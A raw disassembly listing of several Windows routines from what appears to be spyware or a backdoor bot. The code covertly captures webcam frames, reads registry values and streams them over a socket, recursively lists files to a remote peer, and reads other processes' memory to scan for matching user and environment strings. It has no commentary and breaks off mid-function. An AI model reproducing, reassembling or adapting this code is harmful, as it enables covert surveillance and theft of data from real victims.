var_2C = dword ptr -2Ch
lpMem = dword ptr -4
arg_0 = dword ptr 8
wParam = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
xor esi, esi
push edi
inc esi
xor ebx, ebx
push esi
push dword ptr unk_4448C4
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push 42C154h
call capCreateCaptureWindowA
mov edi, eax
cmp edi, ebx
jnz short loc_409376
mov eax, esi
jmp loc_409572
; ---------------------------------------------------------------------------
loc_409376: ; CODE XREF: sub_409338+35�j
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_409393
push ebx ; lParam
push [ebp+wParam] ; wParam
push 40Ah ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
jmp short loc_409395
; ---------------------------------------------------------------------------
loc_409393: ; CODE XREF: sub_409338+47�j
xor eax, eax
loc_409395: ; CODE XREF: sub_409338+59�j
cmp eax, ebx
jnz short loc_4093A0
loc_409399: ; CODE XREF: sub_409338+8B�j
; sub_409338+BC�j
mov ebx, esi
jmp loc_409569
; ---------------------------------------------------------------------------
loc_4093A0: ; CODE XREF: sub_409338+5F�j
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_4093C0
lea eax, [ebp+lParam]
push eax ; lParam
push 2Ch ; wParam
push 40Eh ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_4093C0: ; CODE XREF: sub_409338+71�j
cmp [ebp+var_7C], ebx
jz short loc_409399
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_4093E3
push ebx ; lParam
push ebx ; wParam
push 42Ch ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
mov [ebp+wParam], eax
jmp short loc_4093E6
; ---------------------------------------------------------------------------
loc_4093E3: ; CODE XREF: sub_409338+96�j
mov [ebp+wParam], ebx
loc_4093E6: ; CODE XREF: sub_409338+A9�j
push [ebp+wParam]
call sub_418175
cmp eax, ebx
pop ecx
mov [ebp+lpMem], eax
jz short loc_409399
push [ebp+wParam]
call sub_418175
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_40940D
xor ebx, ebx
inc ebx
jmp loc_409569
; ---------------------------------------------------------------------------
loc_40940D: ; CODE XREF: sub_409338+CB�j
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_40942A
push [ebp+lpMem] ; lParam
push [ebp+wParam] ; wParam
push 42Ch ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_40942A: ; CODE XREF: sub_409338+DE�j
push [ebp+wParam]
push [ebp+lpMem]
push esi
call sub_417A40
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_409445
mov ecx, 0A0h
loc_409445: ; CODE XREF: sub_409338+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_40944F
push 78h
pop eax
loc_40944F: ; CODE XREF: sub_409338+112�j
push edi ; hWnd
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call IsWindow ; IsWindow
test eax, eax
jz short loc_409494
push esi ; lParam
push [ebp+wParam] ; wParam
push 42Dh ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_409494: ; CODE XREF: sub_409338+14A�j
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_4094B1
lea eax, [ebp+var_64]
push eax ; lParam
push 60h ; wParam
push 441h ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_4094B1: ; CODE XREF: sub_409338+165�j
push edi ; hWnd
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call IsWindow ; IsWindow
test eax, eax
jz short loc_4094EF
lea eax, [ebp+var_64]
push eax ; lParam
push 60h ; wParam
push 440h ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_4094EF: ; CODE XREF: sub_409338+1A3�j
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_40950A
push [ebp+arg_0] ; lParam
push ebx ; wParam
push 414h ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_40950A: ; CODE XREF: sub_409338+1C0�j
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_409523
push ebx ; lParam
push ebx ; wParam
push 43Eh ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_409523: ; CODE XREF: sub_409338+1DB�j
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_409540
push [ebp+lpMem] ; lParam
push [ebp+wParam] ; wParam
push 42Dh ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_409540: ; CODE XREF: sub_409338+1F4�j
push [ebp+lpMem] ; lpMem
call sub_418227
push esi ; lpMem
call sub_418227
pop ecx
pop ecx
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_409569
push ebx ; lParam
push ebx ; wParam
push 40Bh ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_409569: ; CODE XREF: sub_409338+63�j
; sub_409338+D0�j ...
push edi ; hWnd
call DestroyWindow ; DestroyWindow
mov eax, ebx
loc_409572: ; CODE XREF: sub_409338+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_409338 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409577(SOCKET s, int, int)
sub_409577 proc near ; CODE XREF: sub_40FCA3+59D2�p
var_3F4 = byte ptr -3F4h
var_2F0 = dword ptr -2F0h
Data = byte ptr -0F0h
var_70 = byte ptr -70h
cbData = dword ptr -0Ch
var_8 = dword ptr -8
hKey = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F4h
push ebx
xor ebx, ebx
cmp dword ptr unk_42C164, ebx
mov [ebp+cbData], 80h
jz loc_409723
push esi
push edi
mov eax, 42C164h
mov esi, 42C170h
mov edi, 42D384h
loc_4095A7: ; CODE XREF: sub_409577+1A4�j
lea ecx, [ebp+hKey]
push ecx ; phkResult
push 20019h ; samDesired
push ebx ; ulOptions
push dword ptr [eax] ; lpSubKey
push dword ptr [esi-10h] ; hKey
call RegOpenKeyExA ; RegOpenKeyExA
lea eax, [ebp+cbData]
push eax ; lpcbData
lea eax, [ebp+Data]
push eax ; lpData
push ebx ; lpType
push ebx ; lpReserved
push dword ptr [esi-8] ; lpValueName
push [ebp+hKey] ; hKey
call RegQueryValueExA ; RegQueryValueExA
test eax, eax
jnz loc_40970A
mov eax, [esi]
cmp eax, ebx
jz loc_4096CE
push eax
lea eax, [ebp+Data]
push eax
lea eax, [ebp+var_3F4]
push 42D37Ch
push eax
call sub_41795B
lea eax, [ebp+var_3F4]
push 42A9E8h
push eax
call sub_41924D
add esp, 18h
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_40970A
push eax
jmp short loc_409637
; ---------------------------------------------------------------------------
loc_409622: ; CODE XREF: sub_409577+D0�j
push dword ptr [esi+4]
lea eax, [ebp+var_70]
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_40964B
push [ebp+var_8]
loc_409637: ; CODE XREF: sub_409577+A9�j
lea eax, [ebp+var_70]
push 64h
push eax
call sub_41974C
add esp, 0Ch
test eax, eax
jnz short loc_409622
jmp short loc_4096C3
; ---------------------------------------------------------------------------
loc_40964B: ; CODE XREF: sub_409577+BB�j
push 3Dh
push dword ptr [esi+4]
call sub_419690
pop ecx
test eax, eax
pop ecx
lea eax, [ebp+var_70]
jz short loc_40968A
push 42D378h
push eax
call sub_419260
push 42D378h
push ebx
call sub_419260
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_41795B
add esp, 20h
jmp short loc_40969E
; ---------------------------------------------------------------------------
loc_40968A: ; CODE XREF: sub_409577+E5�j
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_41795B
add esp, 10h
loc_40969E: ; CODE XREF: sub_409577+111�j
push ebx ; int
lea eax, [ebp+var_2F0]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
lea eax, [ebp+var_2F0]
push eax
call sub_40CB08
add esp, 18h
loc_4096C3: ; CODE XREF: sub_409577+D2�j
push [ebp+var_8]
call sub_418F0B
pop ecx
jmp short loc_40970A
; ---------------------------------------------------------------------------
loc_4096CE: ; CODE XREF: sub_409577+6A�j
lea eax, [ebp+Data]
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_2F0]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
lea eax, [ebp+var_2F0]
push eax
call sub_40CB08
add esp, 28h
loc_40970A: ; CODE XREF: sub_409577+60�j
; sub_409577+A2�j ...
push [ebp+hKey] ; hKey
call RegCloseKey ; RegCloseKey
add esi, 18h
lea eax, [esi-0Ch]
cmp [eax], ebx
jnz loc_4095A7
pop edi
pop esi
loc_409723: ; CODE XREF: sub_409577+19�j
pop ebx
leave
retn
sub_409577 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_409726(LPVOID)
sub_409726 proc near ; DATA XREF: sub_40FCA3+3E33�o
var_49C = dword ptr -49Ch
s = dword ptr -29Ch
var_298 = dword ptr -298h
var_218 = dword ptr -218h
var_115 = byte ptr -115h
var_114 = dword ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+s]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_4180D0
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_40977B
lea eax, [ebp+var_114]
push eax
call sub_4180D0
pop ecx
mov [ebp+eax+var_115], bl
loc_40977B: ; CODE XREF: sub_409726+3F�j
lea eax, [ebp+var_218]
push eax
push 42D3C8h
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_417EDA
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_4097C0
push ebx ; int
lea eax, [ebp+var_49C]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_298]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_4097C0: ; CODE XREF: sub_409726+78�j
lea eax, [ebp+var_114]
push ebx ; int
push eax ; int
lea eax, [ebp+var_218]
push eax ; int
lea eax, [ebp+var_298]
push [ebp+var_C] ; int
push eax ; int
push [ebp+s] ; s
call sub_40983E
push eax
lea eax, [ebp+var_49C]
push 42D398h
push eax
call sub_41795B
add esp, 24h
cmp [ebp+var_8], ebx
jnz short loc_40981E
push ebx ; int
lea eax, [ebp+var_49C]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_298]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40981E: ; CODE XREF: sub_409726+D6�j
lea eax, [ebp+var_49C]
push eax
call sub_40CB08
push [ebp+var_10]
call sub_417735
pop ecx
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_409726 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40983E(SOCKET s, int, int, int, int, int)
sub_40983E proc near ; CODE XREF: sub_409726+B9�p
; sub_40983E+9E�p
var_54C = dword ptr -54Ch
var_34C = dword ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_248]
push 42D410h
push esi
push eax
call sub_417EDA
mov edi, dword ptr byte_4240B0+4
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, 42D37Ch
jz short loc_4098FB
loc_40988A: ; CODE XREF: sub_40983E+BB�j
test [ebp+var_144], 10h
jz short loc_4098E7
cmp [ebp+var_118], 2Eh
jnz short loc_4098AE
cmp [ebp+var_117], 0
jz short loc_4098E7
cmp [ebp+var_117], 2Eh
jz short loc_4098E7
loc_4098AE: ; CODE XREF: sub_40983E+5C�j
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_34C]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_417EDA
push [ebp+arg_14] ; int
lea eax, [ebp+var_34C]
push eax ; int
push [ebp+arg_C] ; int
push [ebp+arg_8] ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40983E
add esp, 2Ch
mov [ebp+arg_14], eax
loc_4098E7: ; CODE XREF: sub_40983E+53�j
; sub_40983E+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call dword ptr byte_4240B0
test eax, eax
jnz short loc_40988A
loc_4098FB: ; CODE XREF: sub_40983E+4A�j
push [ebp+var_4]
call dword ptr byte_42409C+8
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_417EDA
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_409981
loc_409932: ; CODE XREF: sub_40983E+141�j
lea eax, [ebp+var_118]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_54C]
push [ebp+arg_10]
push 42D400h
push 200h
push eax
call sub_417EDA
push 1 ; int
lea eax, [ebp+var_54C]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call dword ptr byte_4240B0
test eax, eax
jnz short loc_409932
loc_409981: ; CODE XREF: sub_40983E+F2�j
push esi
call dword ptr byte_42409C+8
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_40983E endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_409990(LPVOID)
sub_409990 proc near ; DATA XREF: sub_40FCA3+54CE�o
var_29C = dword ptr -29Ch
s = dword ptr -9Ch
var_98 = dword ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
hProcess = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+hProcess]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+s]
rep movsd
xor esi, esi
inc esi
mov [eax+90h], esi
call sub_40C271
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_4099CF
cmp eax, 2
jz short loc_4099CF
push 42D648h
jmp loc_409B0E
; ---------------------------------------------------------------------------
loc_4099CF: ; CODE XREF: sub_409990+2E�j
; sub_409990+33�j
push esi ; int
push offset byte_42D630 ; lpName
call sub_4160EF
pop ecx
test eax, eax
pop ecx
jz loc_409B09
push ebx
push 42D624h
call dword ptr byte_4240D4+4
mov esi, dword ptr byte_4240D4
mov edi, eax
push 42D608h
push edi
mov [ebp+var_8], edi
call esi ; byte_4240D4
push 42D5ECh
push edi
mov dword ptr unk_445AD4, eax
call esi ; byte_4240D4
push 42D5CCh
push edi
mov dword ptr unk_445AC8, eax
call esi ; byte_4240D4
push 42D5B0h
push edi
mov dword ptr unk_445CD8, eax
call esi ; byte_4240D4
push 42D594h
push edi
mov dword ptr unk_445AD0, eax
call esi ; byte_4240D4
mov dword ptr unk_445ACC, eax
call sub_409B62
test eax, eax
mov [ebp+hProcess], eax
jz loc_409ADC
mov esi, GetEnvironmentVariableW
mov edi, 400h
mov ebx, offset Buffer
push edi ; nSize
push ebx ; lpBuffer
push offset Name ; lpName
call esi ; GetEnvironmentVariableW
push edi ; nSize
mov edi, offset word_4452C8
push edi ; lpBuffer
push offset word_42D568 ; lpName
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push 445CDCh ; int
push [ebp+hProcess] ; hProcess
jnz short loc_409A88
call sub_409CEB
jmp short loc_409A8D
; ---------------------------------------------------------------------------
loc_409A88: ; CODE XREF: sub_409990+EF�j
call sub_409E8F
loc_409A8D: ; CODE XREF: sub_409990+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_409AD5
cmp dword ptr unk_445CDC, 0
jnz short loc_409ABC
push ebx
push edi
push [ebp+hProcess]
lea eax, [ebp+var_29C]
push 42D4F0h
push 200h
push eax
call sub_417EDA
add esp, 18h
jmp short loc_409AEF
; ---------------------------------------------------------------------------
loc_409ABC: ; CODE XREF: sub_409990+10A�j
cmp [ebp+var_4], 1
push [ebp+hProcess]
jnz short loc_409ACC
call sub_409FBC
jmp short loc_409AD1
; ---------------------------------------------------------------------------
loc_409ACC: ; CODE XREF: sub_409990+133�j
call sub_40A053
loc_409AD1: ; CODE XREF: sub_409990+13A�j
pop ecx
push eax
jmp short loc_409AE1
; ---------------------------------------------------------------------------
loc_409AD5: ; CODE XREF: sub_409990+101�j
push 42D4A8h
jmp short loc_409AE1
; ---------------------------------------------------------------------------
loc_409ADC: ; CODE XREF: sub_409990+B6�j
push 42D460h
loc_409AE1: ; CODE XREF: sub_409990+143�j
; sub_409990+14A�j
lea eax, [ebp+var_29C]
push eax
call sub_41795B
pop ecx
pop ecx
loc_409AEF: ; CODE XREF: sub_409990+12A�j
push 0 ; int
push offset byte_42D630 ; lpName
call sub_4160EF
pop ecx
pop ecx
push [ebp+var_8]
call dword ptr byte_4240CC
pop ebx
jmp short loc_409B1C
; ---------------------------------------------------------------------------
loc_409B09: ; CODE XREF: sub_409990+4E�j
push 42D418h
loc_409B0E: ; CODE XREF: sub_409990+3A�j
lea eax, [ebp+var_29C]
push eax
call sub_41795B
pop ecx
pop ecx
loc_409B1C: ; CODE XREF: sub_409990+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_409B43
push esi ; int
lea eax, [ebp+var_29C]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+var_98]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_409B43: ; CODE XREF: sub_409990+191�j
lea eax, [ebp+var_29C]
push eax
call sub_40CB08
push [ebp+var_18]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_409990 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
sub_409B62 proc near ; CODE XREF: sub_409990+AC�p
lpMultiByteStr = dword ptr -18h
dwBytes = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+dwBytes], 0
push ebx
push ebp
push esi
mov esi, GetProcessHeap
mov ebx, 100h
push edi
push ebx ; dwBytes
push 8 ; dwFlags
call esi ; GetProcessHeap
mov edi, HeapAlloc
push eax ; hHeap
call edi ; HeapAlloc
mov ebp, eax
lea eax, [esp+28h+dwBytes]
push eax
push ebx
push ebp
push 10h
call dword ptr unk_445AD4
push ebp ; lpMem
push 0 ; dwFlags
call esi ; GetProcessHeap
push eax ; hHeap
call HeapFree
push [esp+28h+dwBytes] ; dwBytes
push 8 ; dwFlags
call esi ; GetProcessHeap
push eax ; hHeap
call edi ; HeapAlloc
mov ebp, eax
mov eax, [esp+28h+dwBytes]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call dword ptr unk_445AD4
test eax, eax
jnz short loc_409C4F
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_409C4F
xor ecx, ecx
mov ebx, ebp
inc ecx
cmp eax, ecx
mov [esp+28h+lpMultiByteStr], ecx
jb short loc_409C4F
loc_409BEB: ; CODE XREF: sub_409B62+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_409C42
push 0
push 0
call dword ptr unk_445AC8
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword ptr unk_445CD8
test eax, eax
jnz short loc_409C33
mov eax, [edi+60h]
push 42D69Ch
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax ; lpMultiByteStr
call sub_4197A3
pop ecx
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_409C67
loc_409C33: ; CODE XREF: sub_409B62+AA�j
test edi, edi
jz short loc_409C3E
push edi
call dword ptr unk_445AD0
loc_409C3E: ; CODE XREF: sub_409B62+D3�j
mov eax, [esp+28h+var_10]
loc_409C42: ; CODE XREF: sub_409B62+8E�j
add ebx, 10h
inc [esp+28h+lpMultiByteStr]
cmp [esp+28h+lpMultiByteStr], eax
jbe short loc_409BEB
loc_409C4F: ; CODE XREF: sub_409B62+6D�j
; sub_409B62+7A�j ...
xor edi, edi
loc_409C51: ; CODE XREF: sub_409B62+17D�j
push ebp ; lpMem
push 0 ; dwFlags
call esi ; GetProcessHeap
push eax ; hHeap
call HeapFree
mov eax, edi
loc_409C5F: ; CODE XREF: sub_409B62+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_409C67: ; CODE XREF: sub_409B62+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_409CD0
lea eax, [edi+80h]
mov [esp+28h+lpMultiByteStr], eax
loc_409C7D: ; CODE XREF: sub_409B62+16C�j
add [esp+28h+lpMultiByteStr], 11Ch
push 42D694h
push [esp+2Ch+lpMultiByteStr] ; lpMultiByteStr
call sub_4197A3
pop ecx
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_409CE4
push 42D68Ch
push [esp+2Ch+lpMultiByteStr] ; lpMultiByteStr
call sub_4197A3
pop ecx
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_409CC2
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_409CC2: ; CODE XREF: sub_409B62+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_409C7D
loc_409CD0: ; CODE XREF: sub_409B62+10F�j
test edi, edi
jz short loc_409CDB
push edi
call dword ptr unk_445AD0
loc_409CDB: ; CODE XREF: sub_409B62+170�j
mov edi, [esp+28h+var_4]
jmp loc_409C51
; ---------------------------------------------------------------------------
loc_409CE4: ; CODE XREF: sub_409B62+13C�j
xor eax, eax
jmp loc_409C5F
sub_409B62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409CEB(DWORD lpMem, int)
sub_409CEB proc near ; CODE XREF: sub_409990+F1�p
SystemInfo = _SYSTEM_INFO ptr -64h
Buffer = _MEMORY_BASIC_INFORMATION ptr -40h
SystemTime = _SYSTEMTIME ptr -24h
LocalFileTime = _FILETIME ptr -14h
var_C = dword ptr -0Ch
NumberOfBytesRead= dword ptr -8
hProcess = dword ptr -4
lpMem = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+lpMem] ; dwProcessId
mov [ebp+LocalFileTime.dwHighDateTime], esi
push esi ; bInheritHandle
push 410h ; dwDesiredAccess
call OpenProcess ; OpenProcess
cmp eax, esi
mov [ebp+hProcess], eax
jnz short loc_409D14
xor eax, eax
jmp loc_409E8C
; ---------------------------------------------------------------------------
loc_409D14: ; CODE XREF: sub_409CEB+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+SystemInfo]
push eax ; lpSystemInfo
call GetSystemInfo ; GetSystemInfo
push [ebp+SystemInfo.dwPageSize] ; dwBytes
mov [ebp+NumberOfBytesRead], esi
mov esi, GetProcessHeap
push 8 ; dwFlags
call esi ; GetProcessHeap
mov edi, HeapAlloc
push eax ; hHeap
call edi ; HeapAlloc
lea ecx, [ebp+NumberOfBytesRead]
mov ebx, ReadProcessMemory
push ecx ; lpNumberOfBytesRead
mov [ebp+lpMem], eax
push [ebp+SystemInfo.dwPageSize] ; nSize
push eax ; lpBuffer
push 7FFDF000h ; lpBaseAddress
push [ebp+hProcess] ; hProcess
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_409D64
xor esi, esi
jmp loc_409E7F
; ---------------------------------------------------------------------------
loc_409D64: ; CODE XREF: sub_409CEB+70�j
lea eax, [ebp+Buffer]
push 1Ch ; dwLength
push eax ; lpBuffer
mov eax, [ebp+lpMem]
push dword ptr [eax+18h] ; lpAddress
push [ebp+hProcess] ; hProcess
call VirtualQueryEx ; VirtualQueryEx
test eax, eax
jz loc_409E6E
mov ecx, [ebp+Buffer.State]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_409E6E
test byte ptr [ebp+Buffer.Protect+1], 1
jnz loc_409E6E
push [ebp+Buffer.RegionSize] ; dwBytes
push 8 ; dwFlags
call esi ; GetProcessHeap
push eax ; hHeap
call edi ; HeapAlloc
mov edi, eax
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov eax, [ebp+lpMem]
push [ebp+Buffer.RegionSize] ; nSize
mov [ebp+var_C], edi
push edi ; lpBuffer
push dword ptr [eax+18h] ; lpBaseAddress
push [ebp+hProcess] ; hProcess
call ebx ; ReadProcessMemory
test eax, eax
jz loc_409E6E
loc_409DC7: ; CODE XREF: sub_409CEB+110�j
push edi
push 444AC8h
call sub_423116
pop ecx
test eax, eax
pop ecx
jnz short loc_409DEF
lea eax, [edi+200h]
push eax
push 4452C8h
call sub_423116
pop ecx
test eax, eax
pop ecx
jz short loc_409DFF
loc_409DEF: ; CODE XREF: sub_409CEB+EB�j
mov eax, [ebp+Buffer.RegionSize]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jb short loc_409DC7
jmp short loc_409E6E
; ---------------------------------------------------------------------------
loc_409DFF: ; CODE XREF: sub_409CEB+102�j
test edi, edi
jz short loc_409E6E
lea eax, [ebp+LocalFileTime]
push eax ; lpLocalFileTime
lea eax, [edi+410h]
push eax ; lpFileTime
call FileTimeToLocalFileTime ; FileTimeToLocalFileTime
test eax, eax
jz short loc_409E3A
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
lea eax, [ebp+LocalFileTime]
push eax ; lpFileTime
call FileTimeToSystemTime ; FileTimeToSystemTime
test eax, eax
jz short loc_409E3A
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_409E3A: ; CODE XREF: sub_409CEB+12B�j
; sub_409CEB+13D�j
movzx eax, byte ptr [edi+42Dh]
mov dword ptr unk_445CE8, eax
mov eax, [ebp+lpMem]
mov [ebp+LocalFileTime.dwHighDateTime], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov dword ptr unk_445CE0, eax
mov dword ptr unk_445CE4, edi
loc_409E6E: ; CODE XREF: sub_409CEB+90�j
; sub_409CEB+A2�j ...
push [ebp+lpMem] ; lpMem
push 0 ; dwFlags
call esi ; GetProcessHeap
push eax ; hHeap
call HeapFree
mov esi, [ebp+LocalFileTime.dwHighDateTime]
loc_409E7F: ; CODE XREF: sub_409CEB+74�j
push [ebp+hProcess]
call dword ptr byte_424074+4
pop edi
mov eax, esi
pop ebx
loc_409E8C: ; CODE XREF: sub_409CEB+24�j
pop esi
leave
retn
sub_409CEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409E8F(DWORD hProcess, int)
sub_409E8F proc near ; CODE XREF: sub_409990:loc_409A88�p
SystemInfo = _SYSTEM_INFO ptr -4Ch
Buffer = _MEMORY_BASIC_INFORMATION ptr -28h
var_C = dword ptr -0Ch
NumberOfBytesRead= dword ptr -8
var_4 = dword ptr -4
hProcess = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push [ebp+hProcess] ; dwProcessId
push 0 ; bInheritHandle
push 410h ; dwDesiredAccess
call OpenProcess ; OpenProcess
test eax, eax
mov [ebp+hProcess], eax
jnz short loc_409EAE
leave
retn
; ---------------------------------------------------------------------------
loc_409EAE: ; CODE XREF: sub_409E8F+1B�j
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
and dword ptr [eax], 0
lea eax, [ebp+SystemInfo]
push eax ; lpSystemInfo
call GetSystemInfo ; GetSystemInfo
mov ebx, [ebp+SystemInfo.lpMinimumApplicationAddress]
mov eax, [ebp+SystemInfo.lpMaximumApplicationAddress]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_409F76
mov edi, GetProcessHeap
loc_409ED8: ; CODE XREF: sub_409E8F+E1�j
